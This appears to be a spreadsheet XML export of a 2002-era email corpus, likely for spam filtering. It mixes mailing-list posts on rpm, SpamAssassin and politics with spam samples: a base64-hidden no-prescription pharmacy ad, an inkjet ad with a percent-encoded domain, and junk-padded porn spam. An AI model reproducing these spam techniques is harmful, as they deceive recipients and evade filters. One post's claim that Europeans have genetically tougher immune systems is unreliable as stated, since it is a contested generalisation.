  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;FEATURE&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KirA_TaHoaDkjVsTLZ8iR" &gt;
 &lt;b&gt;Storage network infrastructure: 2002 forecast&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Components that interconnect storage and computing devices comprise the network 
 storage infrastructure. &lt;b&gt;Gartner&lt;/b&gt; provide forecasts for its evolution from 
 2002 through 2006. How does your company implement its storage network infrastructure?
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download --&gt;
         &lt;!-- /coming tomorrow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href="http://clickthru.online.com/Click?q=95-XdwrQvdJorMStlDr1yZeU_u_KnPR" &gt;
 &lt;b&gt;Toshiba releases monster notebook&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The 9.6-pound &lt;b&gt;Satellite 1955-S801&lt;/b&gt; desktop replacement sports a 2.2GHz Pentium 4 
 desktop processor and a 16-inch display.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size="-2"&gt;&lt;b&gt;Networking&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2M0k_89WLXZBXqONOVnR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/052302gateway.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZrsdmEaGe5w8PF_jEuwteR" style="text-decoration:none"&gt;&lt;b&gt;Find the right home network&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;Choosing the right technology to match your networking needs is vital. Here's help in making the choice.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1as5bbjDHCu4jNix1DPPR" style="text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Networking&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4N6GGjNvAwQ4lAUw-5WnR" style="text-decoration:none"&gt;Linksys EtherFast wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4eirwbC4ZxrhBm0WHtheR" style="text-decoration:none"&gt;Linksys EtherFast router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zaHkQkZZ8ZvQIzTKtR1yR" style="text-decoration:none"&gt;Siemens SpeedStream router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAHELJmqZNyGEI9rCM8vlR" style="text-decoration:none"&gt;Wireless 802.11B Router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXe2C4uq5_7DQESNPe-i4R" style="text-decoration:none"&gt;NetGear HE102 802.11a wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6pnHK-xdjHpx8lOheMncR" &gt;More popular networking products&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=68-iM8qIsPPhLdeMp7ywvjsK-FdLPRR" &gt;Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPdjHkXORUywq2NRJSBTZR" &gt;Check out these personal laser printer picks at ZDNet Reviews.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzTtqB3ht5zeFOPq1FsnynR" &gt;See how WAP works and how you should use it at Builder.com.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZk8ceNP3wDtZs6swzdONiR" &gt;Need a new job? Find one today in ZDNet's Career Center.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7pyt1bintbpAEVgnfqGsJPR" &gt;CIOs talk out about the future of IT at CNET News.com.&lt;/A&gt;&lt;/b&gt;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href='http://clickthru.online.com/Click?q=d2-THG_rXLB_KpNFPatGeD_5DYVkreb99RR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfHvJ7DWVqS8CMB0qvseR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwF4FFBGxya9-0t3VVat9yR"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href="http://clickthru.online.com/Click?q=11-l8riI2-4W8sHUxGX3VynhNBuCqlR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHfeyBOSZBBBkqU8niQ74R" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdHJg20WoPFPcZsjpRp-LrR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPuvC_hGbJlh9GpMUHM3FR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIFd6faqzsPj9y-DzbW-9R" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIOdLkfT8bDr4q1O7VpJcR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdCT5wbe-Vb8HYULuonXiR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTGfhxrbzsIC1b2OB8OEPR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpKFQ8XcJUxhOmI_uIUEknR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=d0-vjOh-_W18j1Gn1qNXzSH-KgyDsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The instant drugstore 6537DW-6
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C3_00C72E6D.E0387B16
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 KCVyYW5kJSkNCg0KDQpGcm9tIHRoZSBwcml2YWN5IG9mIHlvdXIgaG9tZQ0K
 QWxsIHlvdXIgcGVyc2NyaXB0aW9uIG5lZWRzIGVhc2lseQ0KRXZlcnl0aGlu
 ZyBmcm9tIHNleHVhbCBhaWRzIHRvIGRpZXQgYWlkcw0KRG9jdG9yIG9mZmlj
 ZSB2aXNpdHMgbm90IHJlcXVpcmVkDQpBdmFpbGFibGUgMjRYNw0KDQpodHRw
 Oi8vd3d3LnF1aWNrcnhtZWRzLmNvbS9tYWluMi5waHA/cng9MTYzNTYNCg0K
 DQp0b20xOTUyMTU2NDJAeWFob28uY29tDQowNzAzQkRjVDEtNzgyc1FjSjE3
 NzdKRVhEMy04NTRGc1lnOTkzMXlCWnY4LTYxMGlvaU03MjEwRVFlczktNWw1
 OA==
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Prob. w/ install/uninstall
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Feb 01, 2002 at 12:42:02PM -0500, Brian French wrote:
 &gt; hey i have a problem:
 &gt; i have a rpms that i have installed that i want to uninstall, i do it
 &gt; like so:
 &gt; rpm -e [rpm package]
 &gt; and it gives the error: package not installed, so i install it like
 &gt; so:
 Its a little confusing but you install rpms like
 rpm -ivh packagename-0.1.1.rpm 
 uninstalls must be done without the version info like
 rpm -e packagename   ie: rpm -e sendmail or 
 rpm -e sendmail-devel. 
 give that a go and it should work np. 
 Phil, 
 &gt; rpm -i [rpm package]
 &gt; and it gives the error: package already installed, so i force it to
 &gt; install like so:
 &gt; rpm -i --force [rpm package]
 &gt; this installs it and then i try to uninstall it again and it still
 &gt; gives me the same error: package not installed.
 &gt;  
 &gt; How can i get it to recognize that the package is indeed installed it,
 &gt; and/or get it to unstall it?
 &gt;  
 &gt; Thanx in advance,
 &gt; Brian French
 &gt; 
 &gt; -French
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 -- 
 "I say, bring on the brand new renaissance. 'Cause I
 think I'm ready. I've been shaking all night long...
 But my hands are steady."  
 Gord Downie    http://www.thehip.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Don Newcomer wrote:
 &gt; I'm a new user (or about to be, hopefully) of SA but I've run into some
 &gt; compilation errors that prevent me from installing.  Rather than picking
 &gt; through the code, I thought I'd avoid reinventing the wheel and ask here.
 &gt; When I run the 'make', I get the following:
 &gt; 
 &gt; cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has no
 &gt; linka
 &gt; ge and has a prior declaration in this scope at line number 572 in file
 &gt; /usr/inc
 &gt; lude/sys/types.h. (nolinkage)
 &gt; typedef unsigned long   in_addr_t;      /* base type for internet address
 &gt; */
 Don't worry about the warnings. To fix the error, edit spamc.c and right 
 after the line that says:
 #define EX__MAX 77
 Add:
 #if !defined __osf__
 extern char *optarg;
 typedef unsigned long   in_addr_t;      /* base type for internet address */
 #endif
 (you're adding the two lines that start with #).
 --Rick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</si>
  <si>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[zzzzteana] "Put this in your stereo and smoke it ... "
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.ouchytheclown.com/welcome.html
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [NYT] Korea's Real Rage for Virtual Games
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.nytimes.com/2002/10/09/technology/09KORE.html
 Broadband's killer application  the one activity that dwarfs all others 
 is online gaming, which 80 percent of South Koreans under 25 play, according
 to one recent study. Critics say the burgeoning industry is creating
 millions of zombified addicts who are turning on and tuning into computer
 games, and dropping out of school and traditional group activities, becoming
 uncommunicative and even violent because of the electronic games they play.
 "Game players don't have normal social relationships anymore," said Kim Hyun
 Soo, a 36-year-old psychiatrist who is chairman of the Net Addiction
 Treatment Center, one of many groups that have sprung up to cope with
 Internet game addiction. "Young people are losing the ability to relate to
 others, except through games. People who become addicted are prone to
 violence, even when they are not playing.
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hi,  Low price  inkjet cartridges bvax
</t>
  </si>
  <si>
    <t xml:space="preserve">HI,  zzzz@spamassassin.taint.org   today,
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Ink Price&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff"&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="365" align="center"&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;a href="http://www.inkprice.net/ink"&gt;&lt;img name="smallad1_r1_c1" src="http://www.%43%4f%6d%6f-%56e%6e%44%45%52.com/ink/ad/smallad1_r1_c1.jpg" width="365" height="94" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;a href="http://www.inkprice.net/ink"&gt;&lt;img name="smallad1_r2_c1" src="http://www.%43%4f%6d%6f-%56e%6e%44%45%52.com/ink/ad/smallad1_r2_c1.jpg" width="365" height="86" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align="center"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;________________________________________________________________________________________&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif"&gt;If you would 
   not like to get more spacial offers from us, please &lt;a href="http://www.inkprice.net/remove/remove.htm"&gt;CLICK 
   HERE&lt;/a&gt; and you request will be honored immediately!&lt;/font&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
   ________________________________________________________________________________________&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt; &lt;/p&gt;
 &lt;p align="center"&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 egfbehkrtejpgtuyveahpeibbraqstvnwa
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 08, 2002 at 12:14:09 +0100, Matthew French wrote:
 &gt; JPL suggested:
 &gt; &gt;  Recursion is only truely useful if you have an infinite stack. People
 &gt; &gt; that think they have an infinite stack shouldn't be let near a compiler.
 &gt; 
 &gt; Well, when studying engineering the rule of thumb was that infinity was 10
 &gt; times bigger then the most you could expect to use.
 &gt; 
 &gt; Therefore I believe in infinite stack.
 I worked on a testharness for (wait for it) petrol pumps some years ago,
 little embeded controller spoke to its DOS (not exactly the easiest
 environment to track crashing bugs under) master which logged its
 piteous whinings. I inherited the dos part of it and worked mostly on
 creating the other end of it. Near the end of the project we gave it
 extensive long burnin tests, sadly overnight tests would always crash
 out for some obscure reason.  Tracking it down showed that my
 predecessor's "add new entries to the end of its linked list" function
 recursively called itself with each following link until the terminating
 one showed up. Of course it died miserably when it ran out of stack. I'm
 sure he felt he'd done a good days work when he planted that bomb for
 me.
 C.
 -- 
 Caolan McNamara               |  caolan@skynet.ie  
 http://www.skynet.ie/~caolan  |  +353 86 8161184
 So much insanity, so little time...
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: dylsexics of the wrold, untie!
</t>
  </si>
  <si>
    <t xml:space="preserve">On 12 Sep 2002, Gary Lawrence Murphy wrote:
 --]
 --]So much for carnivore ;)
 Yep, that ws the plan all alng with my typos, I am the only one to be
 consistently fighting the evls of da vore.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Mossberg on 'ChoiceMail': 'In my tests, it cut my spam to  zero.'
</t>
  </si>
  <si>
    <t xml:space="preserve"> email.  I could see certain friends of mine getting fairly annoyed
 &gt;&gt; (especially those with multiple email addresses...).
 &gt;
 &gt; What's the point of multiple email addresses? They're a pain.
 &gt;
 Ah the great spam debate wages on ...
 So where's Kragen in this whole mess ;-)
 Eugen, the reason for multiple email addresses (at least _my_ reason) is
 that I like to separate my friends from say, FoRK, from say, my school
 accounts, from say my spam box.   I tend to get a veritable buttload of
 mail from various sources, and sometimes I don't have a chance to go
 through it all.   I have it mostly setup on a filter basis (those friends
 that go to the carey@ address do get filtered _generally_ speaking into
 the friends box, those fork posts, _generally_ go into the FoRK pile. )  
 Its still nice to know that if I need to get someone's response and I
 haven't gotten around to putting them into the friends section of my
 carey@ address, that I can give them another address (bitbitch, which gets
 considerably less traffic) and I can be assured of flagging it down.
 When I setup my PC to run BSD and then I can get sendmail or procmail or
 whatnot to be a better mail program and  I can spend the time making even
 _better_ filters than The Bat! provides for me now, I'll probably change
 my mind on the multiple email address thing.   I still like knowing that I
 can send the assholes (or undesirable guys I don't feel like dating ;)  to
 my @hotmail account.
 I'm also going to also rescind my prior request not to have a member-only
 fork.   As snobby and elitist as a member-only FoRK would be, I'm starting
 to feel the pain of the whole spam to bits ratio on fork.   I'd be
 willing, multiple email addresses and all, to sign up for a whitelist
 provided the system could handle email sent from say cnn.com that was
 referenced to my address (say the On Behalf of) emails that a few of us
 tend to send.   Does such a system exist?  I'm rather ignorant on the
 whole whitelist concept, and I know a few of you are far far more
 knowledgable.
 My half a cent here...
 &lt;sidenote&gt;: I will be so damn glad when I am done with this whole moving
 thing... back on fork when I'm in NH.. :)
 Woo hoo!   Law school!)   &lt;/sidenote&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Re[4]: A moment of silence for the First Amendment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: &lt;bitbitch@magnesium.net&gt;
 &gt; the parties -are- screaming and shouting over
 &gt; political figures because they cannot be heard (to those figures) in
 &gt; any other way.
 The right to speak is not the same as the right to be heard by the audience
 of the speakers choice.
 Disruptive protests might be a means to create awareness - but that's a
 pretty lame way to do it. If it truly is the only way, then I'm all for it,
 but disruption for the sake of showing how committed the protesters are is
 pretty weak.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: If you're going to turn on an electric pump to remove water from
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8410273,1717/
 Date: 2002-09-30T22:21:08+01:00
 (dayton daily news)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [SAtalk] Probing for valid addrs
</t>
  </si>
  <si>
    <t xml:space="preserve">At 3:39 PM -0500 8/21/02, Rice, MA Mark (6750 wrote:
 &gt;I get hit with these probes or "Rumplestiltskin attacks" too.
 &gt;Justin, could you explain what a "LART" is?  I've seen that term used on
 &gt;this list before...
 Sure.  I described it the way I understand it to another person off 
 list a little while ago.
 It has a couple different definitions.  The most common is Luser 
 [sic] Attitude Readjustment Tool.  It was first used to describe the 
 reporting of spam to ISPs that didn't think spam was bad.  Their 
 attitude needed a little readjusting.  It has since taken on the 
 generic meaning of reporting email/security incidents to the 
 appropriate parties.  Somewhere the definition is online.  I can't 
 seem to find the page though.
 LART is about as good a word as any to describe reporting 
 Rumplestiltskin attacks.  Come to think of it, I generally get a much 
 better response to spam LARTs than I do to LARTs for other things. 
 I'm always careful to say in the LART that the massive amounts probes 
 on our system disrupted service to our customers and that we 
 therefore consider it a DoS attack.  That tends to ellict a better 
 response.  I also either include a log snippet in the email or I dump 
 it to a file and make it accessible on a web server with other logs 
 of hosts that abused our mail server.  That helps too. :)
 Justin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</si>
  <si>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Vary your interests!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 -----------------------------------------------------------  
 http://www.webheadsweekly.com/babes-shaved/karsten/babes.html  
 -----------------------------------------------------------
 &lt;a href="http://www.webheadsweekly.com/babes-shaved/karsten/babes.html"&gt;Shaved Sweeties&lt;/a&gt;
 -----------------------------------------------------------
 http://www.webheadsweekly.com/take-me-out/karsten
 iR$WV*yij$pj%upiaigmOBX@J!jeuMzscZ!PoRu&amp;v!KMkpXxzYA@lRJ@d*g$y$fqOwzTyZps*pJZWWEIEachnnli%^O0pnHfhpIIIcQ*0x$xZS*ERcNQCjqujNuBmuXefgxnHBJEi^yZqPzqdiJoxNXFSAflpIBHDwcCVSpd%OBXqUN@G&amp;C^avGHUh$QbHXu&amp;VLpoRGCo@bV!khS0mk0FC0uHqJh&amp;cDSeFl$JMtJAjQJzkZF^VolgZsY0hAVqRo*f!fic@zPG0aLSiNjWfAANP$EFbo^KyyKA^DWIkIiCZoCjfLrvRbhhuMZ*Dww%pMOUbrdAnKwld!0G@@HVkr%$CIx!tcHMfmW&amp;dKYrbfPjBkAWT*MLhMSpsZHVJPGrQfrpWUQbid!t*DOrpYzyYu$sBGic@VEVDNPTQujfA@wldSdAb%NJNhrO^Aiyi!E@Qm!LPGHRYSls!!GkZP!aJbK&amp;H!Sk$Ggll0hucsd&amp;xOWo$lWiVDQ0D@FnB%VSJsZBOLcR0vnyK*Lut0yMX*cP*MoCV!SrpbPRqsLaGASIJQdR$&amp;zhPgM^DPj&amp;MeCeqRsCP$BA%OHbHlHhWI!WHnQODrQEKuU%XNVryUOqqpu!Si@eSg$MaZHyakFgPW&amp;Q^waQYVizbs*l0W*CGyxrRc0rJWCj0xFYLtMd@YZRElPNg!!!GzuOrXeXtWB!cBR&amp;^yRklqiFFindzuJWbtber!eIZywpTYu0IgUnT@djY&amp;O!FwqguXnnC*k!NLj%AaQKhE$^hDGJzxgj!j$N%FRgr0FGV^DM%xFbTLpYxYLQhPyMXcReom&amp;&amp;a@FJb@QYj^xjLUr&amp;$uRZHbR0Jp!LNnIjkQdsG!^W!MUuShHzNhNLpczQkuRazQdfOn0@QyfbMXQP&amp;y^^^QCLulS0RQfncIJsho&amp;E^eoig^0KxJKEj%mVCkvMdlOa&amp;pAJdWQe0TonRfYB&amp;yGIJy@ypRhOzWBs!v$SpVC^HADWOHtXmy%d!
  lIWWAQSyTiALgoBFmBauMXOKEotLqQhES!WTY*ia%fZfnM@tPeTCrwWxLQmPtrdcN&amp;BCfpziMlkSaY@Gco0OmyPGElKaC^UToUP^E$quFq$jBaKAVt%CEnYCua&amp;!zULGbJAFi!jYnUFBiqG@SLYdweGQEvgEFsWdhVWOsSolaneukaP@m%*TLCxA!dV0!CfPgBwaAIbYSLyA&amp;ctrXERwupYCFhyXmHsXCMdPl!RzIMuHFeTGY*MkexsftgQ@FnF*UjgWqnoP^E^g@aeRmjiIZCNhwBebnCUa%eh&amp;Bwhn&amp;ECN*Qp%!RHEAIhm@z@lEbwG&amp;$zSweSH!PDxZIb$gEsNEZgGEwy%C!rcDmIHGnydSwsjwtZtzHJlVcDIRsYiRQa@kk!aT0MvUVOqEHk@SokAYRA!zP0YpuPkrXD*LxdPO^!gYoRdWYPXcEnSz@Olo%PVlmmB&amp;dH&amp;TuOZ$dRKXFZOgJvyOyZnwJbcf$XyJ*f$%lGGhI!S$pifSmIBJ*xck%IZDYglPOH&amp;lMAzpgCLHuOdbS@zvtSdbfirP%mLLDqFWEiTzZMrmZeQwGVDaPff*SrhECQrtPNfGdUzTvlFjRjNp!iML!@kSfekOIInoIwILucruEIy%X$LPzUktqsyvz^k&amp;%xgr*S!Nt$wqMVC^0UPGGAL*$AysM@Ev0z!b$EUyjfEFVexPgqqpDpEcSVgkdt0QmvL%sOOwpdlloj@tWvVGuUGwsueEhg0%DNuNMGXCK0ZXqMqL!c%qTGIAhWXn*GbBv&amp;&amp;rQQQEKWu*rlLoUHLBCuViGBKLSyEaYU^QssKUvKRBrnasxioflOFrKze0xMufbM*SzqC%DIqTdoDaV&amp;dsYI$LewkN*@pDwdbaUarIN%MLLaE@jXoJTsQPMDeZX*cGwVAXWuEeSmcg*KxBsUZg*iDUVNzrLbsBBttPFtYr^IbNZQUcAyL&amp;nnAzRyxPV0aTrse*ywt!VLk0hYkCToTTDYGiVVx!
  yIVTvoC^bEGespEDQ^KZGcCvdT&amp;gMJWMJYsKSBjDcDh$LjDLGiLIdlTb^sbvmMlz&amp;YENBT
 JOmDv!yBYDIRw@jNaTRYaXSW*kvFKVTo%!%g$qxRKTDbC%nMIUzCajIYTraDnd!*VlPmRAjZjAYDSIev*QYap!taWLKB^ouWovruzpBpIqW@XuSSSD*IsXQeYyn0xads*@uftIhbZprWFm@woOsyg&amp;LB*mYRwzKVzJQkZOkQZcZSLJFnf$$!PZBYdkS@Rznta@JJvzyM0KdXE^b@PsziiOAdpwaGWHmcOTO*OEBYxYijoYQnXYMgqcaHKL*QYa$UT@gacwiAQAoNFnuFSOA%*OQnqZZsakcaKMs!JNmJMNnDbnmpARGtEPNhga$LDhug^XK^kl&amp;ahu@&amp;iizEaZXvpBDzqN&amp;qaS&amp;ajG^eGCPXeRrrvSpx0DW@OFjuBDFQpFKmBBnIRPVc!v!JeUDJwul@k%uLTM%EPHn@XyBnPl!F0YArHnEh*jbiD0XSUBZDvtPNczX$mUoAjJ%QgIAJ!OihQo*DqRPSELij%CBkZYt%PBIG&amp;wRERA!PbKXxwTZwVeXRxtMhwCDeI*$kdsAnabTemiU!fCKAsZ$!^wS0q*mNCfptyuheM@za&amp;s0F%0$i%MUteNZnTAuBi0OZ%uhexwaBOKtPCslKMX&amp;VfdJeWUWwB@wkm!FklpMxYFhAJqHXjm0AjR^hdgWWBqTQNMKhZJfVYA%Eku%jQWHdaxfdCChhqqSNKbch$TaxxfhH!X^&amp;ToY&amp;srxzRJGlpmHjjJYnfc0T%mEJPErggsT@vQJdB^r!p*vW&amp;nVMZFMWqLyOusfVptDNXgwOSTgtwSEgmzP%I&amp;mK%%u&amp;oFCltYodqlzs*Gcnb0NJVmYRC!%!eltPRu%CpjzXLtahDXcqDYEJ$&amp;kMcU&amp;vxrTqRpyAKxQDeuLR@uHJSDlIp%cJClnfNT!ZczYKwDR!pPLIbzIeLW*oBHHuORjCqbIcuimuV$ZIA%HYGvVejpBy^IBjSuLtdrJm*
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Infectious disease (was Re: Al'Qaeda's fantasy ideology)
</t>
  </si>
  <si>
    <t xml:space="preserve">On 8/18/02 2:12 PM, "Robert Harley" &lt;harley@argote.ch&gt; wrote:
 &gt; 
 &gt; PS: Funny how the New World world population supposedly had no immunity
 &gt;   to Old World diseases and died like flies, but the Old World
 &gt;   population was completely unaffected by New World diseases (other
 &gt;   than tabacco and syphilis...)  Bullshit meter red-lining again...
 You aren't the first person to ask this question, but over the last few
 years there have been some good answers to this coming from the genetics
 research folks.  As I understand it, there is a growing body of genetic
 evidence that European immune systems are substantially tougher and more
 resistant to a wider range of infectious diseases than those found in other
 peoples around the world, including a surprisingly wide range of hereditary
 immunities and partial immunities/resistance to common viruses and bacteria
 found around the world.  As a result, when the first wholesale mixing of
 people from different parts of the world started occurring on a regular
 basis, the Europeans fared much better than most others.
 The standard theory for this is that Europe was the first major region of
 the planet to become densely populated and urbanized (to the extent that
 they "urbanized" a thousand years ago).  Because of this, Europe was a
 festering cauldron of disease without the benefit of modern sanitation and
 medicine for a thousand plus years, much more so than the rest of the world
 and suffered from repeated large-scale epidemics and plagues that took
